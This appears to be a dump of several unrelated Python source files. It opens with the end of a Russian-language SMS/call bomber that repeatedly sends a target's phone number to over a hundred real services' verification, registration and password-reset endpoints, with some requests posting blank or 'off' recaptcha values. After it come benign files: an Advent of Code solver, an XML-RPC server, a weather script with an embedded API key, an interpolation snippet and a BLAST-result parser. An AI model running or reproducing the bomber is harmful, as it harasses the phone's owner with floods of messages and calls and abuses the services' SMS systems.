requests.post("https://vladikavkaz.edostav.ru/site/CheckAuthLogin", data={"phone_or_email":_phone}, headers={"Host": "vladikavkaz.edostav.ru", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US, en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Content-Length": "26"})
except:
pass
try:
requests.post("https://fix-price.ru/ajax/register_phone_code.php", data={"register_call": "Y", "action": "getCode", "phone": "+" + _phone})
except:
pass
try:
requests.post("https://ube.pmsm.org.ru/esb/iqos-phone/validate", json={"phone": _phone})
except:
pass
try:
requests.post("https://api.ivi.ru/mobileapi/user/register/phone/v6", data={"phone": _phone})
except:
pass
try:
requests.post("https://account.my.games/signup_send_sms/", data={"phone": _phone})
except:
pass
try:
requests.post("https://www.ozon.ru/api/composer-api.bx/_action/fastEntry", json={"phone": _phone, "otpId": 0})
except:
pass
try:
requests.post("https://smart.space/api/users/request_confirmation_code/", json={"mobile": "+" +_phone, "action": "confirm_mobile"})
except:
pass
try:
requests.post("https://dostavista.ru/backend/send-verification-sms", data={"phone": _phone9dostavista})
except:
pass
try:
requests.post("https://eda.yandex/api/v1/user/request_authentication_code", json={"phone_number": "+" + _phone})
except:
pass
try:
requests.post("https://shop.vsk.ru/ajax/auth/postSms/", data={"phone": _phone})
except:
pass
try:
requests.post("https://msk.tele2.ru/api/validation/number/" +_phone, json={"sender": "Tele2"})
except:
pass
try:
requests.post("https://p.grabtaxi.com/api/passenger/v2/profiles/register", data={"phoneNumber": _phone, "countryCode": "ID", "name": "test", "email": "mail@mail.com", "deviceToken": "*"}, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"})
except:
pass
try:
requests.post("https://belkacar.ru/get-confirmation-code", data={"phone": _phone}, headers={})
except:
pass
try:
requests.post("https://www.rabota.ru/remind", data={"credential": _phone})
except:
pass
try:
requests.post("https://rutube.ru/api/accounts/sendpass/phone", data={"phone": "+"+_phone})
except:
pass
try:
requests.post("https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php", data={"name": _name, "phone": _phone, "promo": "yellowforma"})
except:
pass
try:
requests.get("https://www.oyorooms.com/api/pwa/generateotp?phone="+_phone9+"&country_code=%2B7&nod=4&locale=en")
except:
pass
try:
requests.post("https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCode", params={"pageName": "registerPrivateUserPhoneVerificatio"}, data={"phone": _phone, "recaptcha": "off", "g-recaptcha-response": ""})
except:
pass
try:
requests.post("https://newnext.ru/graphql", json={"operationName": "registration", "variables": {"client": {"firstName": "Иван", "lastName": "Иванов", "phone": _phone, "typeKeys": ["Unemployed"]}}, "query": "mutation registration($client: ClientInput!) {""\n registration(client: $client) {""\n token\n __typename\n }\n}\n"})
except:
pass
try:
requests.post("https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/", json={"client_type": "personal", "email": _email, "mobile_phone": _phone, "deliveryOption": "sms"})
except:
pass
try:
requests.post("https://lk.invitro.ru/sp/mobileApi/createUserByPassword", data={"password": password, "application": "lkp", "login": "+" + _phone})
except:
pass
try:
requests.post("https://online.sbis.ru/reg/service/", json={"jsonrpc":"2.0", "protocol":"5", "method":"Пользователь.ЗаявкаНаФизика", "params":{"phone":_phone}, "id":"1"})
except:
pass
try:
requests.post("https://ib.psbank.ru/api/authentication/extendedClientAuthRequest", json={"firstName":"Иван", "middleName":"Иванович", "lastName":"Иванов", "sex":"1", "birthDate":"10.10.2000", "mobilePhone": _phone9, "russianFederationResident":"true", "isDSA":"false", "personalDataProcessingAgreement":"true", "bKIRequestAgreement":"null", "promotionAgreement":"true"})
except:
pass
try:
requests.post("https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru", data={"phone": _phone})
except:
pass
try:
requests.post("https://api.carsmile.com/", json={"operationName": "enterPhone", "variables": {"phone": _phone}, "query": "mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n"})
except:
pass
try:
requests.post("https://terra-1.indriverapp.com/api/authorization?locale=ru", data={"mode": "request", "phone": "+" + _phone, "phone_permission": "unknown", "stream_id": 0, "v": 3, "appversion": "3.20.6", "osversion": "unknown", "devicemodel": "unknown"})
except:
pass
try:
requests.post("http://smsgorod.ru/sendsms.php", data={"number": _phone})
except:
pass
try:
requests.post("https://www.stoloto.ru/send-mobile-app-link", data={"phone": _phone})
except:
pass
try:
requests.post("https://cabinet.wi-fi.ru/api/auth/by-sms", data={"msisdn": _phone}, headers={"App-ID": "cabinet"})
except:
pass
try:
requests.post("https://api.wowworks.ru/v2/site/send-code", json={"phone": _phone, "type": 2})
except:
pass
try:
requests.post("https://api-prime.anytime.global/api/v2/auth/sendVerificationCode", data={"phone": _phone})
except:
pass
try:
requests.post("https://www.delivery-club.ru/ajax/user_otp", data={"phone": _phone})
except:
pass
try:
requests.post("https://alfalife.cc/auth.php", data={"phone": _phone})
except:
pass
try:
requests.post("https://app.benzuber.ru/login", data={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://app.cloudloyalty.ru/demo/send-code", json={"country": 2, "phone": _phone, "roistatVisit": "47637", "experiments": {"new_header_title": "1"}})
except:
pass
try:
requests.post("https://api.delitime.ru/api/v2/signup", data={"SignupForm[username]": _phone, "SignupForm[device_type]": 3})
except:
pass
try:
requests.post("https://www.finam.ru/api/smslocker/sendcode", data={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://lenta.com/api/v1/authentication/requestValidationCode", json={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://www.ollis.ru/gql", json={"query": "mutation { phone(number:'%s', locale:ru) { token error { code message } } }"% _phone})
except:
pass
try:
requests.post("https://qlean.ru/clients-api/v2/sms_codes/auth/request_code", json={"phone": _phone})
except:
pass
try:
requests.post("https://app.redmondeda.ru/api/v1/app/sendverificationcode", headers={"token": "."}, data={"phone": _phone})
except:
pass
try:
requests.post("https://app.sberfood.ru/api/mobile/v3/auth/sendSms", json={"userPhone": "+" + _phone}, headers={"AppKey": "WebApp-3a2605b0cf2a4c9d938752a84b7e97b6"})
except:
pass
try:
requests.post("https://shopandshow.ru/sms/password-request/", data={"phone": "+" +_phone, "resend": 0})
except:
pass
try:
requests.get("https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper", params={"oper": 9, "callmode": 1, "phone": "+" +_phone})
except:
pass
try:
requests.get("https://www.sportmaster.ru/", params={"module": "users", "action": "SendSMSReg", "phone": _phone})
except:
pass
try:
requests.post("https://api.tinkoff.ru/v1/sign_up", data={"phone": "+" +_phone})
except:
pass
try:
requests.post('https://api.fex.net/api/v1/auth/scaffold', data={"phone": _phone})
except:
pass
try:
requests.post('https://api.ennergiia.com/auth/api/development/lor', data={"phone": _phone})
except:
pass
try:
requests.post("https://api.chef.yandex/api/v2/auth/sms", json={"phone": _phone})
except:
pass
try:
requests.post("https://pizzahut.ru/account/password-reset", data={"reset_by":"phone", "action_id":"pass-recovery", "phone": _phonePizzahut, "_token":"*"})
except:
pass
try:
requests.post("https://plink.tech/resend_activation_token/?via=call", json={"phone": _phone})
except:
pass
try:
requests.post("https://plink.tech/register/", json={"phone": _phone})
except:
pass
try:
requests.post("https://www.panpizza.ru/index.php?route=account/customer/sendSMSCode", data={"telephone": "8" + _phone9})
except:
pass
try:
requests.post('https://gorzdrav.org/login/register/sms/send', data={"phone": _phoneGorzdrav})
except:
pass
try:
requests.post("https://apteka366.ru/login/register/sms/send", data={"phone": _phoneGorzdrav})
except:
pass
try:
requests.post("https://client-api.sushi-master.ru/api/v1/auth/init", json={"phone": _phone})
except:
pass
try:
requests.get("https://suandshi.ru/mobile_api/register_mobile_user", params={"phone": _phone})
except:
pass
try:
requests.post("https://www.sms4b.ru/bitrix/components/sms4b/sms.demo/ajax.php", data={"demo_number": "+" + _phone, "ajax_demo_send": "1"})
except:
pass
try:
requests.post("https://app.salampay.com/api/system/sms/c549d0c2-ee78-4a98-659d-08d682a42b29", data={"caller_number": _phone})
except:
pass
try:
requests.post("https://mousam.ru/api/checkphone", data={"phone": _phone, "target": "android app v0.0.2"})
except:
pass
try:
requests.post("https://ggbet.ru/api/auth/register-with-phone", data={"phone": "+" + _phone, "login": email, "password": password, "agreement": "on", "oferta": "on"})
except:
pass
try:
requests.post("https://ng-api.webbankir.com/user/v2/create", json={"lastName": name, "firstName": name, "middleName": name, "mobilePhone": _phone, "email": email,"smsCode": ""})
except:
pass
try:
requests.post("https://api.iconjob.co/api/auth/verification_code", json={"phone": _phone})
except:
pass
try:
requests.post("https://3040.com.ua/taxi-ordering", data={"callback-phone": _phone})
except:
pass
try:
requests.post("https://city24.ua/personalaccount/account/registration", data={"PhoneNumber": _phone})
except:
pass
try:
requests.post("https://api.easypay.ua/api/auth/register", json={"phone": _phone, "password": _name})
except:
pass
try:
requests.post("https://api.kinoland.com.ua/api/v1/service/send-sms", headers={"Agent": "website"}, json={"Phone": _phone, "Type": 1})
except:
pass
try:
requests.post("https://www.menu.ua/kiev/delivery/profile/show-verify.html", data={"phone": _phone, "do": "phone"})
except:
pass
try:
requests.post("https://www.menu.ua/kiev/delivery/registration/direct-registration.html", data={"user_info[fullname]": name, "user_info[phone]": _phone, "user_info[email]": email, "user_info[password]": name, "user_info[conf_password]": name})
except:
pass
try:
requests.post("https://mobileplanet.ua/register", data={"klient_name": name, "klient_phone": "+" + _phone, "klient_email": email})
except:
pass
try:
requests.post("https://www.monobank.com.ua/api/mobapplink/send", data={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://www.moyo.ua/identity/registration", data={"firstname": name, "phone": _phone, "email": email})
except:
pass
try:
requests.post("https://auth.multiplex.ua/login", json={"login": _phone})
except:
pass
try:
requests.post("https://www.nl.ua", data={"component": "bxmaker.authuserphone.login", "sessid": "bf70db951f54b837748f69b75a61deb4", "method": "sendCode", "phone": _phone, "registration": "N"})
except:
pass
try:
requests.get("https://secure.online.ua/ajax/check_phone/", params={"reg_phone": _phone})
except:
pass
try:
requests.get("https://cabinet.planetakino.ua/service/sms", params={"phone": _phone})
except:
pass
try:
requests.get("https://www.sportmaster.ua/", params={"module": "users", "action": "SendSMSReg", "phone": _phone})
except:
pass
try:
requests.post("https://www.uklon.com.ua/api/v1/account/code/send", headers={"client_id": "6289de851fc726f887af8d5d7a56c635"}, json={"phone": _phone})
except:
pass
try:
requests.post("https://www.yaposhka.kh.ua/customer/account/createpost/", data={"success_url": "", "error_url": "", "is_subscribed": "0", "firstname": name, "lastname": name, "email": email, "password":name, "password_confirmation": name, "telephone": _phone})
except:
pass
try:
requests.post("https://helsi.me/api/healthy/accounts/login", json={"phone": _phone, "platform": "PISWeb"})
except:
pass
try:
requests.post("https://bamper.by/registration/?step=1", data={"phone": "+" + _phone, "submit": "Запросить смс подтверждения", "rules": "on"})
except:
pass
try:
requests.get("https://it.buzzolls.ru:9995/api/v2/auth/register", params={"phoneNumber": "+" + _phone}, headers={"keywordapi": "ProjectVApiKeyword", "usedapiversion": "3"})
except:
pass
try:
requests.post("https://api.cian.ru/sms/v1/send-validation-code/", json={"phone": "+" + _phone, "type": "authenticateCode"})
except:
pass
try:
requests.post("https://clients.cleversite.ru/callback/run.php", data={"siteid": "62731", "num": _phone, "title": "Онлайн-консультант", "referrer": "https://m.cleversite.ru/call"})
except:
pass
try:
requests.post("https://my.dianet.com.ua/send_sms/", data={"phone": _phone})
except:
pass
try:
requests.post("https://vladimir.edostav.ru/site/CheckAuthLogin", data={"phone_or_email": "+" + _phone})
except:
pass
try:
requests.get("https://api.eldorado.ua/v1/sign/", params={"login": _phone, "step": "phone-check", "fb_id": "null", "fb_token": "null", "lang": "ru"})
except:
pass
try:
requests.post("https://www.etm.ru/cat/runprog.html", data={"m_phone": _phone, "mode": "sendSms", "syf_prog": "clients-services", "getSysParam": "yes"})
except:
pass
try:
requests.post("https://www.flipkart.com/api/5/user/otp/generate", headers={"Origin": "https://www.flipkart.com", "X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop"}, data={"loginId": "+" + _phone})
except:
pass
try:
requests.post("https://www.flipkart.com/api/6/user/signup/status", headers={"Origin": "https://www.flipkart.com", "X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop"}, json={"loginId": "+" + _phone, "supportAllStates": True})
except:
pass
try:
requests.get("https://foodband.ru/api/", params={"call": "customers/sendVerificationCode", "phone": _phone, "g-recaptcha-response": ""})
except:
pass
try:
requests.post("https://friendsclub.ru/assets/components/pl/connector.php", data={"casePar": "authSendsms", "MobilePhone": "+" + _phone})
except:
pass
try:
requests.post("https://crm.getmancar.com.ua/api/veryfyaccount", json={"phone": "+" + _phone, "grant_type": "password", "client_id": "gcarAppMob", "client_secret": "SomeRandomCharsAndNumbersMobile"})
except:
pass
try:
requests.post("https://www.hatimaki.ru/register/", data={"REGISTER[LOGIN]": _phone, "REGISTER[PERSONAL_PHONE]": _phone, "REGISTER[SMS_CODE]": "", "resend-sms": "1", "REGISTER[EMAIL]": "", "register_submit_button": "Зарегистрироваться"})
except:
pass
try:
requests.post("https://helsi.me/api/healthy/accounts/login", json={"phone": _phone, "platform": "PISWeb"})
except:
pass
try:
requests.get("https://api.hmara.tv/stable/entrance", params={"contact": _phone})
except:
pass
try:
requests.post("https://api.imgur.com/account/v1/phones/verify", json={"phone_number": _phone, "region_code": "RU"})
except:
pass
try:
requests.post("https://informatics.yandex/api/v1/registration/confirmation/phone/send/", data={"country": "RU", "csrfmiddlewaretoken": "", "phone": _phone})
except:
pass
try:
requests.post("https://izi.ua/api/auth/register", json={"phone": "+" + _phone, "name": name, "is_terms_accepted": True})
except:
pass
try:
requests.post("https://izi.ua/api/auth/sms-login", json={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://kaspi.kz/util/send-app-link", data={"address": _phone})
except:
pass
try:
requests.post("https://koronapay.com/transfers/online/api/users/otps", data={"phone": _phone})
except:
pass
try:
requests.post("https://rubeacon.com/api/app/5ea871260046315837c8b6f3/middle", json={"url": "/api/client/phone_verification", "method": "POST", "data": {"client_id": 5646981, "phone": _phone, "alisa_id": 1}, "headers": {"Client-Id": 5646981, "Content-Type": "application/x-www-form-urlencoded"}})
except:
pass
try:
requests.post("https://loany.com.ua/funct/ajax/registration/code", data={"phone": _phone})
except:
pass
try:
requests.post("https://api-rest.logistictech.ru/api/v1.1/clients/request-code", json={"phone": _phone}, headers={"Restaurant-chain": "c0ab3d88-fba8-47aa-b08d-c7598a3be0b9"})
except:
pass
try:
requests.post("https://makarolls.ru/bitrix/components/aloe/aloe.user/login_new.php", data={"data": _phone, "metod": "postreg"})
except:
pass
try:
requests.get("https://menza-cafe.ru/system/call_me.php", params={"fio": name, "phone": _phone, "phone_number": "1"})
except:
pass
try:
requests.get("https://my.mistercash.ua/ru/send/sms/registration", params={"number": "+" + _phone,})
except:
pass
try:
requests.post("https://www.niyama.ru/ajax/sendSMS.php", data={"REGISTER[PERSONAL_PHONE]": _phone, "code": "", "sendsms": "Выслать код"})
except:
pass
try:
requests.post("https://piroginomerodin.ru/index.php?route=sms/login/sendreg", data={"telephone": "+" + _phone})
except:
pass
try:
requests.post("https://api.saurisushi.ru/Sauri/api/v2/auth/login", data={"data": json.dumps({"login": _phone})})
except:
pass
try:
requests.post("https://sayoris.ru/?route=parse/whats", data={"phone": _phone})
except:
pass
try:
requests.post("https://shafa.ua/api/v3/graphiql", json={"operationName": "RegistrationSendSms", "variables": {"phoneNumber": "+" + _phone}, "query": "mutation RegistrationSendSms($phoneNumber: String!) {\n unauthorizedSendSms(phoneNumber: $phoneNumber) {\n isSuccess\n userToken\n errors {\n field\n messages {\n message\n code\n __typename\n }\n __typename\n }\n __typename\n }\n}\n"})
except:
pass
try:
requests.post("https://shafa.ua/api/v3/graphiql", json={"operationName": "sendResetPasswordSms", "variables": {"phoneNumber": "+" + _phone}, "query": "mutation sendResetPasswordSms($phoneNumber: String!) {\n resetPasswordSendSms(phoneNumber: $phoneNumber) {\n isSuccess\n userToken\n errors {\n ...errorsData\n __typename\n }\n __typename\n }\n}\n\nfragment errorsData on GraphResponseError {\n field\n messages {\n code\n message\n __typename\n }\n __typename\n}\n"})
except:
pass
try:
requests.get("https://auth.pizza33.ua/ua/join/check/", params={"callback": "angular.callbacks._1", "email": email, "password": password, "phone": _phone, "utm_current_visit_started": 0, "utm_first_visit": 0, "utm_previous_visit": 0, "utm_times_visited": 0})
except:
pass
try:
requests.post("https://sushifuji.ru/sms_send_ajax.php", data={"name": "false", "phone": _phone})
except:
pass
try:
requests.post("https://tabasko.su/", data={"IS_AJAX": "Y", "COMPONENT_NAME": "AUTH", "ACTION": "GET_CODE", "LOGIN": _phone})
except:
pass
try:
requests.post("https://www.tarantino-family.com/wp-admin/admin-ajax.php", data={"action": "callback_phonenumber", "phone": _phone})
except:
pass
try:
requests.post("https://taxi-ritm.ru/ajax/ppp/ppp_back_call.php?URL=/", data={"RECALL": "Y", "BACK_CALL_PHONE": _phone})
except:
pass
try:
requests.post("https://thehive.pro/auth/signup", json={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://uklon.com.ua/api/v1/account/code/send", headers={"client_id": "6289de851fc726f887af8d5d7a56c635"}, json={"phone": _phone})
except:
pass
try:
requests.post("https://partner.uklon.com.ua/api/v1/registration/sendcode", headers={"client_id": "6289de851fc726f887af8d5d7a56c635"}, json={"phone": _phone})
except:
pass
try:
requests.post("https://app.doma.uchi.ru/api/v1/parent/signup_start", json={"phone": "+" + _phone, "first_name": "-", "utm_data": {}, "via": "call"})
except:
pass
try:
requests.post("https://app.doma.uchi.ru/api/v1/parent/signup_start", json={"phone": "+" + _phone, "first_name": "-", "utm_data": {}, "via": "sms"})
except:
pass
try:
requests.post("https://b.utair.ru/api/v1/login/", data={"login": "+" + _phone})
except:
pass
try:
requests.get("https://vezitaxi.com/api/employment/getsmscode", params={"phone": "+" + _phone, "city": 561, "callback": "jsonp_callback_35979"})
except:
pass
try:
requests.post("https://ng-api.webbankir.com/user/v2/create", json={"lastName": russian_name, "firstName": russian_name, "middleName": russian_name, "mobilePhone": formatted_phone, "email": email, "smsCode": ""})
except:
pass
iteration += 1
print(("\033[37m{} круг пройден.\033[0m").format(iteration))
except KeyboardInterrupt:
os.system('cls' if os.name=='nt' else 'clear')
print(logo+"\033[37mТелефон: \033[34m"+_phone+"\n\033[37mСпамер остановлен.\033[0m")
time.sleep(2)
main()
main()
| true |
2389e246bdc3aa3f9954547bac3b8a59f4a5d1f8 | Python | andynormancx/aoc2019 | /day10.py | UTF-8 | 3,013 | 3.28125 | 3 | [] | no_license | #!/usr/local/bin/python3
import InputHelper as IH
import sys
import collections
import math
def solve1(input):
asteroids = {}
for row_index, row in enumerate(input):
rows = len(input)
for col_index, col in enumerate(row):
cols = len(row)
if col == '#':
asteroids[(col_index, row_index)] = 0
for point, _ in asteroids.items():
for search_point, _ in asteroids.items():
if (point != search_point):
points = points_along_line(point, search_point)
blocked = False
for point_on_line in points:
if point_on_line in asteroids:
blocked = True
if not blocked:
asteroids[point] = asteroids[point] + 1
best_count = max(asteroids.values())
station_point = list(filter(lambda x:x[1] == best_count, asteroids.items()))[0][0]
print(f'{station_point} {best_count}')
remaining_asteroids = set(asteroids.keys())
remaining_asteroids.remove(station_point)
destroy_count = 0
while(len(remaining_asteroids) > 0):
visible = sorted(get_visible(remaining_asteroids, station_point), key=lambda x: angle_between(station_point, x))
for point in visible:
destroy_count += 1
print(f'{destroy_count} {point}')
remaining_asteroids.remove(point)
def solve2(input):
return 1
def get_visible(asteroids, search_point):
for asteroid in asteroids:
if (asteroid != search_point):
points = points_along_line(search_point, asteroid)
blocked = False
for point_on_line in points:
if point_on_line in asteroids:
blocked = True
if not blocked:
yield asteroid
def points_along_line(start, end):
len_x = end[0] - start[0]
len_y = end[1] - start[1]
gcd = math.gcd(len_x, len_y)
vector = (int(len_x / gcd), int(len_y / gcd))
point = (start[0] + vector[0], start[1] + vector[1])
while point[0] != end[0] or point[1] != end[1]:
yield point
point = (point[0] + vector[0], point[1] + vector[1])
data = IH.InputHelper(10).readlines()
#(0, -1) = 0
#(1, 0) = 90
#(0, 1) = 180
#(-1, 0) = 270
def angle_between(p1, p2):
ang2 = math.atan2(p2[1] - p1[1], p2[0] - p1[0]) # y, x
return (math.degrees(ang2 % (2 * math.pi)) + 90) % 360
def angle_between2(p1, p2):
ang1 = math.atan2(p1[0], p1[1]) # y, x
ang2 = math.atan2(p2[0], p2[1]) # y, x
return ((math.degrees((ang1 - ang2) % (2 * math.pi)) + 180) % 360)
#print(angle_between((0,0), (0, -1)))
#print(angle_between((0,0), (1, 0)))
#print(angle_between((0,0), (0, 1)))
#print(angle_between((0,0), (-1, 0)))
#print(angle_between((11, 13), (11, 12)))
#print(angle_between((11, 13), (12, 13)))
#print(angle_between((11, 13), (11, 14)))
#print(angle_between((11, 13), (10, 13)))
#quit()
print('Part 1 ', solve1(data))
| true |
2914ea571327e319d92f262a95f0666034a4693e | Python | SD-CC-UFG/carlos.henrique.rorato.sd.ufg | /entrega 5/exercicio4.py | UTF-8 | 630 | 2.53125 | 3 | [
"MIT"
] | permissive | # Sistemas Distribuídos
# Aluno: Carlos Henrique Rorato Souza
# Lista 1 implementada com RPC - XML - Exercício 4 Servidor
# O cliente é análogo ao do exercício 1 - basta modificar as entradas.
from xmlrpc.server import *
def pIdeal(altura, sexo):
if sexo == "masculino":
return (72.7 * altura) - 58
else:
return (62.1 * altura) - 44.7
class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)
HOST = "localhost"
PORT = 5000
with SimpleXMLRPCServer((HOST, PORT), RequestHandler) as server:
server.register_introspection_functions()
server.register_function(pIdeal)
server.serve_forever()
| true |
da8d20d410543589ea155f1f6d91274816341cb7 | Python | Nawaf404/CodingMonth | /Day1/Weather.py | UTF-8 | 354 | 3.203125 | 3 | [] | no_license | import requests
api_address = 'http://api.openweathermap.org./data/2.5/weather?appid=0c42f7f6b53b244c78a418f4f181282a&q='
city = input("Hi, What's your city name :\n")
url = api_address + city
json_data = requests.get(url).json()
main_weather = json_data['weather'][0]['description']
country = json_data['country']
print(country,"\n",main_weather) | true |
6e8643bb2b147cf8a6956cc25d0a604204df3443 | Python | dannytrowbridge/FEADOE | /doe/fitty.py | UTF-8 | 728 | 3.28125 | 3 | [] | no_license | #http://stackoverflow.com/questions/5124126/python-scipy-interpolation-map-coordinates#
import numpy
from scipy import interpolate
x = numpy.array([0.0, 0.60, 1.0])
y = numpy.array([0.0, 0.25, 0.80, 1.0])
z = numpy.array([
[ 1.4 , 6.5 , 1.5 , 1.8 ],
[ 8.9 , 7.3 , 1.1 , 1.09],
[ 4.5 , 9.2 , 1.8 , 1.2 ]])
# you have to set kx and ky small for this small example dataset
# 3 is more usual and is the default
# s=0 will ensure this interpolates. s>0 will smooth the data
# you can also specify a bounding box outside the data limits
# if you want to extrapolate
sp = interpolate.RectBivariateSpline(x, y, z, kx=2, ky=2, s=0)
sp([0.60], [0.25]) # array([[ 7.3]])
sp([0.25], [0.60]) # array([[ 2.66427408]])
| true |
69fb8a5789d335a69e007c4be45cc51350cfe153 | Python | JordanDekker/ContainR | /app/core/containr/parse_blast_results.py | UTF-8 | 10,819 | 2.765625 | 3 | [
"MIT"
] | permissive | import pandas as pd
from Bio.Blast import NCBIXML
from flask import session
def read_output(ref_dic, blast_xml_file, main_df):
"""Uses the Bio.Python parser to parse the output file of the BLAST.
Args:
ref_dic: This is an dictionary where the key is the UID and the value the taxonomy.
result_file: This is the path to the file that contains the blast results in XML format.
df: The df that is based upon the TSV input file.
Returns:
main_df: The original df with the blast results added in its own columns.
"""
try:
with open(blast_xml_file, 'r') as blast_xml:
lijst = [{}, {}]
# NCBIXML.parse makes a iterater within are objects with the data from the blast #
blast_records = NCBIXML.parse(blast_xml)
for record in blast_records:
blast_record_alignment = record.alignments
header = record.query
if len(blast_record_alignment) != 0:
# selecting the wanted data from the record #
bit_score = blast_record_alignment[0].hsps[0].bits
length = blast_record_alignment[0].hsps[0].align_length
identity = int(100 / length * blast_record_alignment[0].hsps[0].identities)
accession = blast_record_alignment[0].hit_id
if '|' in accession:
accession = accession.split('|')[1]
taxonomic_name = ref_dic[accession]
if header[0] != '@':
header = '@'+header
# splitting the data in Forward sequences and Reverse sequences #
if '/1' in header:
lijst[0][header.replace(' /1', '')] = (
[accession, taxonomic_name, identity, bit_score, length] + taxonomic_name.split('; '))
else:
lijst[1][header.replace(' /2', '')] = (
[accession, taxonomic_name, identity, bit_score, length] + taxonomic_name.split('; '))
for i, prefix in enumerate(['fw_', 'rv_']):
#overwrite values even if indices dont match
if prefix+'full_tax' in main_df.columns:
for column_name in ['accession', 'full_tax','id','bit','coverage_length','Kingdom','Phylum','Class','Order','Family','Genus','Species','Strain']:
del main_df[prefix+column_name]
# transfer the list(lijst) with data to a dataframe #
taxonomic_df = pd.DataFrame.from_dict(lijst[i],
columns=[prefix + 'accession', prefix + 'full_tax', prefix + 'id',
prefix + 'bit', prefix + 'coverage_length',
prefix + 'Kingdom', prefix + 'Phylum', prefix + 'Class', prefix + 'Order',
prefix + 'Family', prefix + 'Genus', prefix + 'Species', prefix + 'Strain'], orient='index')
# combine the new dataframe with the main dataframe and check if the main_df isn't empty else update it
if len(main_df) == 0:
main_df.update(taxonomic_df)
temp_main_df = pd.merge(main_df,taxonomic_df, left_index=True, right_index=True, how="outer")
dtypes = main_df.dtypes.combine_first(taxonomic_df.dtypes)
# Make sure the columns are the correct dtype
for key, value in dtypes.iteritems():
try:
temp_main_df[key] = temp_main_df[key].astype(value)
except ValueError:
if value in [int,float]:
temp_main_df[key] = pd.to_numeric(temp_main_df[key], errors = "coerce")
else:
raise ValueError
main_df = temp_main_df
for column in [prefix + 'Kingdom', prefix + 'Phylum', prefix + 'Class', prefix + 'Order',
prefix + 'Family', prefix + 'Genus', prefix + 'Species', prefix + 'Strain']:
main_df[column] = list(map(fill_unknown_single, main_df[[column, prefix+"flagged"]].values.tolist()))
del temp_main_df
for strand in ["fw","rv"]:
main_df[strand+"_full_tax"] = list(map(fill_unknown, main_df[[strand+"_full_tax",strand+"_flagged"]].values.tolist()))
main_df[strand+"_Species"] = list(map(lambda x: x[0].split("; ")[-1] if len(str(x[0]).split("; ")) == 7 else x[1], main_df[[strand+"_full_tax",strand+"_Species"]].values.tolist()))
return main_df
except FileNotFoundError:
raise FileNotFoundError
def fill_unknown(info):
"""Fill in the empty taxonomy spots in the full_tax column.
Args:
info: List containing taxonomy data.
Returns:
String with taxonomy data separated by semicolons.
"""
tax = info[0]
if info[1]: # info[1] is the flag column
return tax
if tax is None or tax == "" or pd.isnull(tax):
return "unknown"
else:
tax = ["unknown" if x.startswith("u-") or x.startswith("unclassified") else x for x in tax.split("; ")]
if len(tax) == 7:
if "_" in list(tax[6]):
tax[6] = tax[5]+" "+tax[6].split("_")[1]
return "; ".join(tax)
def fill_unknown_single(info):
"""Fills in the empty tax spots per column.
Args:
info: ?
Returns:
item: ?
"""
item = info[0]
if info[1]: # check if flagged
return item
if item == "" or pd.isna(item) or pd.isnull(item):
return "unknown"
if item.startswith("u-") or item.startswith("unclassified"):
return "unknown"
else:
return item
def read_ref(ref_file):
"""Reads the reference file and converts it to a dictionary.
Args:
ref_file: This is the path to the file that contains the reference data.
Returns:
ref_dic: This is an dictionary where the key is the UID and the value the taxonomy.
"""
try:
ref_dic = {}
with open(ref_file, 'r') as file:
for line in file:
# Results from split(): index 0 is the first value that we take (UID), the 3 is the last indice,
# and the 2 is the steps of what location we pick, so when use this we get the 0 and 2 indices that
# stand for the UID and taxonomy.
accession_code, taxonomic_name = line.replace('\n', '').split(',')[0:3:2]
ref_dic[accession_code] = taxonomic_name
return ref_dic
except FileNotFoundError:
raise FileNotFoundError
def convert_results(main_df):
"""Takes the dataframe and converts it into an json that works with the d3 sunburst visualisation.
Args:
main_df: Main dataframe object.
Returns:
ref_dic: A dictionary where the key is the UID and the value the taxonomy.
"""
# Only select the full taxonomy and group them by name.
taxonomy_df = pd.concat([main_df[main_df["fw_visual_flag"] == False]['fw_full_tax'], main_df[main_df["rv_visual_flag"] == False]['rv_full_tax']], ignore_index = True)
# Drop the empty values.
# TODO: These values are not usueless so find a way to use them.
taxonomy_df = taxonomy_df.dropna()
# Count the repeating stuff and sort them to make sure that double values won't get thrown.
taxonomy_count = taxonomy_df.value_counts()
taxonomy_count.sort_index(inplace=True)
# Create the root.
root = {'name':'flare', 'children':[]}
# Loop over the species.
for idx, species in enumerate(taxonomy_count):
# Determine the sequence and size after wards split the sequence/taxonomy and reset the current_noce to the root/base.
taxonomy_sequence = taxonomy_count.index[idx]
size = int(species)
parts = taxonomy_sequence.split("; ")
current_node = root
# Loop over the parts of the taxonomy and meanwhile traverse thew the dictionary/json accordingly.
for i, node_name in enumerate(parts):
children = current_node["children"]
# Check if youre not at the end of the taxonomy chain.
if i < (len(parts)-1):
# Param to make sure that there will be no double childs/taxa in the sunburst.
missing_child = True
# Check the child nodes of the current taxa if the child is found make a record of it, set the missing_child to false because you found it.
# After ward break out of the loop because you really dont want to loop over 200 extra values.
for child in children:
if child['name'] == node_name:
child_node = child
missing_child = False
break
# Check if we've found our missing taxa, if not add it to the dictionary.
if missing_child:
child_node = {'name':node_name, 'children':[]}
